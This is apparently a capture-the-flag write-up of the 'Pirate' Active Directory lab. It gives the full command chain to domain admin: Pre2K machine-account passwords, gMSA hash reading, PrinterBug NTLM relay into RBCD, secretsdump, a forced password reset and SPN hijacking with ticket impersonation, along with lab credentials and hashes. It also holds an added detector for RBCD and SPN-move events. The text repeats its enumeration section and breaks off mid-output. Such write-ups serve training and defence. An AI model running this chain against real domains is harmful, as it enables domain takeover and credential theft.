This is a complete practical walkthrough of the "Pirate" domain penetration testing machine. The attack path is clear: first, LDAP enumeration reveals a configuration flaw in the "Pre-Windows 2000 Compatible Access" group; the Pre2K weakness is used to obtain the machine account (MS01$) password, which in turn allows reading the gMSA service credentials for an initial foothold. Next, Ligolo-ng is used to set up an internal network tunnel, and the PrinterBug combined with NTLM relay is used to carry out an RBCD (Resource-Based Constrained Delegation) attack, compromising WEB01 and dumping user hashes. Finally, the password of a.white_ADM is forcibly reset, its WriteSPN permission is used for SPN hijacking, and together with constrained delegation a domain administrator ticket is forged, ultimately taking full control of the domain controller (DC01).

Enumeration

As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!&

# Nmap 7.98 scan initiated Thu Mar  5 03:58:32 2026 as: /usr/lib/nmap/nmap -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,5985,9389,49667,49685,49686,49688,49689,49913,61992,62014 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.169
Nmap scan report for 10.129.7.169
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-05 10:58:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
443/tcp   open  https?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T11:00:17+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49913/tcp open  msrpc         Microsoft Windows RPC
61992/tcp open  msrpc         Microsoft Windows RPC
62014/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/5%Time=69A8FF73%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-05T10:59:39
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar  5 04:00:18 2026 -- 1 IP address (1 host up) scanned in 106.48 seconds

SMB

➜  Pirate nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' --shares
SMB         10.129.7.169    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         10.129.7.169    445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
SMB         10.129.7.169    445    DC01             [*] Enumerated shares
SMB         10.129.7.169    445    DC01             Share           Permissions     Remark
SMB         10.129.7.169    445    DC01             -----           -----------     ------
SMB         10.129.7.169    445    DC01             ADMIN$                          Remote Admin
SMB         10.129.7.169    445    DC01             C$                              Default share
SMB         10.129.7.169    445    DC01             IPC$            READ            Remote IPC
SMB         10.129.7.169    445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.7.169    445    DC01             SYSVOL          READ            Logon server share

Check SYSVOL and NETLOGON

nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' -M spider_plus
{
    "NETLOGON": {},
    "SYSVOL": {
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2025-06-08 16:25:14",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 16:25:14",
            "size": "22 B"
        },
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-06-08 14:39:53",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 14:39:56",
            "size": "1.07 KB"
        },
        "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2025-06-08 16:25:14",
            "ctime_epoch": "2025-06-08 16:25:14",
            "mtime_epoch": "2025-06-08 16:25:14",
            "size": "2.72 KB"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2025-06-09 16:12:18",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-09 16:12:18",
            "size": "22 B"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
            "atime_epoch": "2025-06-09 16:12:18",
            "ctime_epoch": "2025-06-09 16:09:27",
            "mtime_epoch": "2025-06-09 16:12:18",
            "size": "312 B"
        },
        "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-06-08 14:39:53",
            "ctime_epoch": "2025-06-08 14:39:53",
            "mtime_epoch": "2025-06-08 14:39:56",
            "size": "3.68 KB"
        }
    }

Nothing of value.


Kerberoasting

impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -request -dc-ip 10.129.7.169
$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$8c19d96...9826a23a8

This hash could not be cracked.


LDAP

➜  Pirate nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --users
LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
LDAP        10.129.7.169    389    DC01             [*] Enumerated 7 domain users: pirate.htb
LDAP        10.129.7.169    389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.129.7.169    389    DC01             Administrator                 2025-06-08 14:32:36 0        Built-in account for administering the computer/domain
LDAP        10.129.7.169    389    DC01             Guest                         <never>             0        Built-in account for guest access to the computer/domain
LDAP        10.129.7.169    389    DC01             krbtgt                        2025-06-08 14:40:29 0        Key Distribution Center Service Account
LDAP        10.129.7.169    389    DC01             a.white_adm                   2026-01-16 00:36:34 0
LDAP        10.129.7.169    389    DC01             a.white                       2025-06-08 19:33:01 0
LDAP        10.129.7.169    389    DC01             pentest                       2025-06-09 13:40:23 0
LDAP        10.129.7.169    389    DC01             j.sparrow                     2025-06-09 15:08:44 0
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --kerberoasting output.txt
LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
LDAP        10.129.7.169    389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.129.7.169    389    DC01             [*] Total of records returned 2
LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-16 00:36:34.388000, lastLogon: 2025-06-09 16:03:37.380258
LDAP        10.129.7.169    389    DC01             $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\a.white_adm*$3d0f7...d6aa2
LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 14:48:41.108220, lastLogon: 2026-03-05 10:51:58.242422
LDAP        10.129.7.169    389    DC01             $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\gMSA_ADFS_prod$*$c7...fc3d

Seems useless; check the groups.

nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --groups
LDAP        10.129.7.169    389    DC01             Pre-Windows 2000 Compatible Access       membercount: 4

Found an interesting group: Pre-Windows 2000 Compatible Access

Background

In Active Directory (AD), the Pre-Windows 2000 Compatible Access group (Security Identifier (SID) S-1-5-32-554) is not a code-level code execution vulnerability but an extremely dangerous security misconfiguration: it leads to severe information disclosure and paves the way for internal network penetration and privilege escalation.

This group was originally designed to let older operating systems such as Windows NT 4.0 query AD information. Its core security risks are mainly the following:

1. Default Overly Permissive Read Access

The group has broad Read permissions at the root of Active Directory. Specifically, its members can read almost all attributes of nearly every user and group object in the domain.

  • Danger: in domains upgraded from earlier systems (such as Windows Server 2000 or 2003), Everyone and Authenticated Users are often members of this group by default.
  • Penetration testing perspective: this means any attacker holding an ordinary low-privileged domain account (since it belongs to Authenticated Users), or in some configurations even an unauthenticated attacker (if Everyone includes anonymous logons), can query the structure of the entire domain without restriction over the Lightweight Directory Access Protocol (LDAP).

2. Anonymous Directory Enumeration

If Everyone belongs to this group and the domain controller allows null sessions or anonymous LDAP binds:

  • An attacker can connect directly to the domain controller over the network without any credentials.
  • Using tools (such as rpcclient or plain LDAP queries), they can enumerate all usernames, the group list, and even the detailed Description fields of certain users.
  • Impact: Description fields frequently contain plaintext passwords, the purpose of service accounts, or other sensitive internal information left there by mistake.

3. Facilitating Advanced Domain Attacks

The unrestricted information gathering that the Pre-Windows 2000 Compatible Access group provides is the cornerstone of subsequent advanced attacks. Attackers can easily collect the following to plan an attack path:

  • Targeting: quickly identify members of high-privilege groups such as Domain Admins and Enterprise Admins.
  • Kerberoasting: enumerate service accounts that carry a Service Principal Name (SPN), request their service tickets, and crack the passwords offline.
  • AS-REP Roasting: query all users configured with "Do not require Kerberos preauthentication" and crack their hashes offline.
  • BloodHound pathfinding: the group's permissions are sufficient for BloodHound to collect most of the node relationship graph and compute the shortest path from an ordinary user to Domain Admin.

4. Persistence & Backdoors

In Red Team operations, an attacker who has gained high privileges may deliberately add ordinary users or dedicated backdoor accounts to the Pre-Windows 2000 Compatible Access group. Because it is a built-in legacy group whose name suggests "compatibility", blue teams and system administrators often overlook it during audits, which lets the attacker keep covert read access to domain information.


Remediation and Defense Measures:

As a defender, or when writing a penetration testing report, recommend the following:

  • Clean up group members: open "Active Directory Users and Computers" (ADUC) and check the members of the Pre-Windows 2000 Compatible Access group. Remove Everyone, Anonymous Logon, and Authenticated Users.
  • Add with caution: unless the network really still contains extremely old legacy systems (which nowadays it usually does not), this group should stay empty.
  • Disable anonymous LDAP: make sure anonymous LDAP binds are disabled in the domain controllers' registry or via Group Policy.

    Exploitation

    Since we are in AUTHENTICATED USERS@PIRATE.HTB (a member of Pre-Windows 2000 Compatible Access), we can effectively read all the information.

    ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(objectClass=user)" > all_users_attributes.txt

    Try to find leaked passwords

    grep -i -E "pass|pwd|userparameters|info" all_users_attributes.txt
    # nothing found

    Try to read the gMSA password

    nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --gmsa
    # Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers

    Only the Domain Secure Servers group can read it; look up its members

    ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(&(objectCategory=group)(cn=Domain Secure Servers))" member
    # returns member: CN=MS01,CN=Computers,DC=pirate,DC=htb

    Only MS01 can read it.


    Pre2K

    A Google search turns up the nxc pre2k module.

    Background

    By default, when a computer joins the domain, the domain controller generates a fully random 120-character machine account password for it (normally rotated automatically every 30 days), which makes brute-forcing machine accounts practically impossible.

    However, the Active Directory Users and Computers (ADUC) management tool has always kept a checkbox that exists only for compatibility with ancient NT systems: "Assign this computer account as a pre-Windows 2000 computer".

    If an administrator ticks this box when pre-creating a computer account manually (for example, no physical machine has been assigned yet and a placeholder is created in AD first), something absurd happens: AD does not generate a random password; instead it uses the lowercase computer name as the initial password!

  • For example: a newly created machine account called SERVERDEMO$ has the password serverdemo
  • Our target is MS01$; if it has this weakness, its password is ms01
    Exploitation

    nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
    # finds MS01$ and EXCH01$

    Read the gMSA passwords

    nxc ldap DC01.pirate.htb -u 'MS01$' -p 'ms01' -k --gmsa
    Account: gMSA_ADCS_prod$      NTLM: 304106f739822ea2ad8ebe23f802d078     
    Account: gMSA_ADFS_prod$      NTLM: 8126756fb2e69697bfcb04816e685839    

    USER

    Connect with evil-winrm

    evil-winrm -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078' -i DC01.pirate.htb

    Check the network

    *Evil-WinRM* PS C:\Users> ipconfig
    
    Windows IP Configuration
    
    
    Ethernet adapter vEthernet (Switch01):
    
       Connection-specific DNS Suffix  . :
       Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
       IPv4 Address. . . . . . . . . . . : 192.168.100.1
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . :
    
    Ethernet adapter Ethernet0 2:
    
       Connection-specific DNS Suffix  . : .htb
       IPv4 Address. . . . . . . . . . . : 10.129.7.169
       Subnet Mask . . . . . . . . . . . : 255.255.0.0
       Default Gateway . . . . . . . . . : 10.129.0.1

    Build a tunnel with ligolo-ng

    For the setup, see the ligolo-ng official site.

    Find live hosts

    nxc smb 192.168.100.0/24
    SMB         192.168.100.1   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
    SMB         192.168.100.2   445    WEB01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:False)

    WEB01 is found, and its SMB signing is disabled, which means an NTLM relay attack can be attempted.

    Check for the print spooler

    nxc smb 192.168.100.2 -u GMSA_ADFS_PROD$ -H 8126756fb2e69697bfcb04816e685839 -M spooler
    # returns Spooler service enabled

    Prepare the relay

    sudo impacket-ntlmrelayx -t smb://10.129.7.169 -smb2support --remove-mic -socks
    # --remove-mic: strip the Message Integrity Code (MIC)

    Configure the forward in ligolo

    [Agent : PIRATE\gMSA_ADFS_prod$@DC01] » listener_add  --addr 0.0.0.0:8888 --to 127.0.0.1:445

    Launch the attack

    python printerbug.py -hashes :8126756fb2e69697bfcb04816e685839 'pirate.htb/GMSA_ADFS_PROD$'@192.168.100.2 10.10.17.34

    Once in, an RBCD attack was carried out, gaining access to the WEB01 machine.

    Use the credentials XUPXYXWJ$:Mvb0i(gL8v$>{PG to obtain administrator's TGT, then dump the NT hashes.

    impacket-secretsdump -k -no-pass -target-ip 192.168.100.2 WEB01.pirate.htb
    # yields a.white : E2nvAOKSz5Xz2MJu

    ROOT

    According to BloodHound, a.white has ForceChangePassword over a.white_ADM.

    bloodyAD --host 192.168.100.1 -d Pirate.htb -u a.white -p E2nvAOKSz5Xz2MJu set password 'a.white_ADM' 'P@ssword123!'
    # [+] Password changed successfully!

    a.white_ADM belongs to the IT group, which has WriteSPN over DC01.PIRATE; find the delegation relationships

    impacket-findDelegation pirate.htb/a.white_adm:'P@ssword123!' -dc-ip 192.168.100.1
    AccountName  AccountType  DelegationType                      DelegationRightsTo     SPN Exists
    -----------  -----------  ----------------------------------  ---------------------  ----------
    DC01$        Computer     Unconstrained                       N/A                    Yes
    a.white_adm  Person       Constrained w/ Protocol Transition  http/WEB01.pirate.htb  Yes
    a.white_adm  Person       Constrained w/ Protocol Transition  HTTP/WEB01             Yes
    XUPXYXWJ$    Computer     Resource-Based Constrained          WEB01$                 No

    SPN Hijacking

    • User a.white_adm is allowed to access the HTTP service on WEB01 on behalf of anyone (protocol transition).
    • a.white_adm has WriteSPN over DC01.

    Exploiting the uniqueness of SPNs, the delegation that should apply to WEB01 is transferred to DC01, so that a.white_adm can access DC01 as administrator.

    Remove the SPN from WEB01

    python3 ~/Work/Tools/krbrelayx/addspn.py -t 'WEB01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'DC01.pirate.htb'  -r --spn 'http/WEB01.pirate.htb'
    # returns SPN Modified successfully

    Transfer it to DC01

    python3 ~/Work/Tools/krbrelayx/addspn.py -t 'DC01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'dc01.pirate.htb' -s 'http/WEB01.pirate.htb'
    # returns SPN Modified successfully

    Get the ticket

    impacket-getST -spn 'http/WEB01.pirate.htb' -impersonate administrator 'pirate.htb/a.white_adm:P@ssword123!' -dc-ip 10.129.7.169 -altservice 'cifs/DC01.pirate.htb'
    # returns Saving ticket in administrator@http_WEB01.pirate.htb@PIRATE.HTB.ccache
    # the -altservice parameter bypasses the protocol-transition restriction

    Because the ticket is long-lived, the DC trusts it.

    impacket-smbclient -k -no-pass DC01.pirate.htb

    Root obtained.
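    As an added defensive example (not from the write-up): a detector for the two directory changes used above, the msDS-AllowedToActOnBehalfOfOtherIdentity write behind the RBCD attack on WEB01 and the servicePrincipalName move from WEB01$ to DC01$ behind the SPN hijack, run over constructed Windows Security events 4741 and 5136 whose field names are simplified from the real records.

```python
"""Added example, not part of the original write-up: spot an RBCD write and an
SPN move in Windows Security events 5136 (Directory Service Changes; requires
that audit subcategory plus a SACL on the objects) and 4741 (computer account
created). The events below are constructed samples with simplified fields."""
from datetime import datetime, timedelta

VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"   # 5136 OperationType codes
WINDOW = timedelta(minutes=30)                        # correlation window (assumption)

# Constructed sample events shaped after the fields of real 4741/5136 records.
SAMPLE_EVENTS = [
    # a new machine account appears, then WEB01's RBCD attribute is written
    {"EventID": 4741, "Time": "2026-03-05T11:20:00", "Subject": "WEB01$",
     "Target": "XUPXYXWJ$"},
    {"EventID": 5136, "Time": "2026-03-05T11:21:10", "Subject": "WEB01$",
     "Object": "CN=WEB01,CN=Computers,DC=pirate,DC=htb",
     "Attr": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "Value": "<security descriptor>", "Op": VALUE_ADDED},
    # an SPN is deleted from WEB01$ and re-added on DC01$ a minute later
    {"EventID": 5136, "Time": "2026-03-05T11:40:00", "Subject": "a.white_adm",
     "Object": "CN=WEB01,CN=Computers,DC=pirate,DC=htb",
     "Attr": "servicePrincipalName", "Value": "http/WEB01.pirate.htb", "Op": VALUE_DELETED},
    {"EventID": 5136, "Time": "2026-03-05T11:41:00", "Subject": "a.white_adm",
     "Object": "CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb",
     "Attr": "servicePrincipalName", "Value": "http/WEB01.pirate.htb", "Op": VALUE_ADDED},
    # benign: a brand-new SPN registered on a new server with no prior delete
    {"EventID": 5136, "Time": "2026-03-05T12:00:00", "Subject": "svc_deploy",
     "Object": "CN=APP02,CN=Computers,DC=pirate,DC=htb",
     "Attr": "servicePrincipalName", "Value": "HOST/APP02.pirate.htb", "Op": VALUE_ADDED},
]


def detect(events, window=WINDOW):
    """Return alerts for RBCD attribute writes and for SPNs moved between objects."""
    alerts = []
    recent_created = []          # (time, subject, new account) from 4741
    removed_spns = {}            # spn -> (time, object DN) from 5136 value deletes
    for ev in sorted(events, key=lambda e: e["Time"]):
        t = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 4741:
            recent_created.append((t, ev["Subject"], ev["Target"]))
            continue
        if ev["EventID"] != 5136:
            continue
        attr = ev["Attr"].lower()
        if attr == "msds-allowedtoactonbehalfofotheridentity":
            # any write here grants delegation to the object; pair it with fresh
            # machine accounts, since RBCD needs a principal with an SPN to act as
            ctx = [acct for (t0, _subj, acct) in recent_created if t - t0 <= window]
            alerts.append({"rule": "rbcd_write", "object": ev["Object"],
                           "subject": ev["Subject"], "new_accounts": ctx})
        elif attr == "serviceprincipalname":
            spn = ev["Value"].lower()
            if ev["Op"] == VALUE_DELETED:
                removed_spns[spn] = (t, ev["Object"])
            elif ev["Op"] == VALUE_ADDED and spn in removed_spns:
                t0, old_dn = removed_spns[spn]
                if old_dn != ev["Object"] and t - t0 <= window:
                    alerts.append({"rule": "spn_moved", "spn": spn, "from": old_dn,
                                   "to": ev["Object"], "subject": ev["Subject"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

    Both rules fire on the sample: the RBCD write on WEB01 correlated with the new XUPXYXWJ$ account, and the http/WEB01.pirate.htb SPN moving from WEB01 to DC01, while the new HOST SPN on APP02 stays silent.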


    Enumeration

    As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!&

    # Nmap 7.98 scan initiated Thu Mar  5 03:58:32 2026 as: /usr/lib/nmap/nmap -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,5985,9389,49667,49685,49686,49688,49689,49913,61992,62014 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.169
    Nmap scan report for 10.129.7.169
    Host is up (0.19s latency).
    
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        (generic dns response: NOTIMP)
    | fingerprint-strings:
    |   DNSVersionBindReqTCP:
    |     version
    |_    bind
    80/tcp    open  http          Microsoft IIS httpd 10.0
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: IIS Windows Server
    | http-methods:
    |_  Potentially risky methods: TRACE
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-05 10:58:39Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=DC01.pirate.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
    | Not valid before: 2025-06-09T14:05:15
    |_Not valid after:  2026-06-09T14:05:15
    |_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
    443/tcp   open  https?
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
    |_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
    | ssl-cert: Subject: commonName=DC01.pirate.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
    | Not valid before: 2025-06-09T14:05:15
    |_Not valid after:  2026-06-09T14:05:15
    2179/tcp  open  vmrdp?
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
    |_ssl-date: 2026-03-05T11:00:18+00:00; +7h00m01s from scanner time.
    | ssl-cert: Subject: commonName=DC01.pirate.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
    | Not valid before: 2025-06-09T14:05:15
    |_Not valid after:  2026-06-09T14:05:15
    3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
    |_ssl-date: 2026-03-05T11:00:17+00:00; +7h00m00s from scanner time.
    | ssl-cert: Subject: commonName=DC01.pirate.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
    | Not valid before: 2025-06-09T14:05:15
    |_Not valid after:  2026-06-09T14:05:15
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    9389/tcp  open  mc-nmf        .NET Message Framing
    49667/tcp open  msrpc         Microsoft Windows RPC
    49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    49686/tcp open  msrpc         Microsoft Windows RPC
    49688/tcp open  msrpc         Microsoft Windows RPC
    49689/tcp open  msrpc         Microsoft Windows RPC
    49913/tcp open  msrpc         Microsoft Windows RPC
    61992/tcp open  msrpc         Microsoft Windows RPC
    62014/tcp open  msrpc         Microsoft Windows RPC
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.98%I=7%D=3/5%Time=69A8FF73%P=x86_64-pc-linux-gnu%r(DNSVe
    SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
    SF:04bind\0\0\x10\0\x03");
    Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    | smb2-time:
    |   date: 2026-03-05T10:59:39
    |_  start_date: N/A
    | smb2-security-mode:
    |   3.1.1:
    |_    Message signing enabled and required
    |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Thu Mar  5 04:00:18 2026 -- 1 IP address (1 host up) scanned in 106.48 seconds

    SMB

    ➜  Pirate nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' --shares
    SMB         10.129.7.169    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
    SMB         10.129.7.169    445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
    SMB         10.129.7.169    445    DC01             [*] Enumerated shares
    SMB         10.129.7.169    445    DC01             Share           Permissions     Remark
    SMB         10.129.7.169    445    DC01             -----           -----------     ------
    SMB         10.129.7.169    445    DC01             ADMIN$                          Remote Admin
    SMB         10.129.7.169    445    DC01             C$                              Default share
    SMB         10.129.7.169    445    DC01             IPC$            READ            Remote IPC
    SMB         10.129.7.169    445    DC01             NETLOGON        READ            Logon server share
    SMB         10.129.7.169    445    DC01             SYSVOL          READ            Logon server share

    View SYSVOL and NETLOGON

    nxc smb 10.129.7.169 -u pentest -p 'p3nt3st2025!&' -M spider_plus
    {
        "NETLOGON": {},
        "SYSVOL": {
            "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
                "atime_epoch": "2025-06-08 16:25:14",
                "ctime_epoch": "2025-06-08 14:39:53",
                "mtime_epoch": "2025-06-08 16:25:14",
                "size": "22 B"
            },
            "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
                "atime_epoch": "2025-06-08 14:39:53",
                "ctime_epoch": "2025-06-08 14:39:53",
                "mtime_epoch": "2025-06-08 14:39:56",
                "size": "1.07 KB"
            },
            "pirate.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
                "atime_epoch": "2025-06-08 16:25:14",
                "ctime_epoch": "2025-06-08 16:25:14",
                "mtime_epoch": "2025-06-08 16:25:14",
                "size": "2.72 KB"
            },
            "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
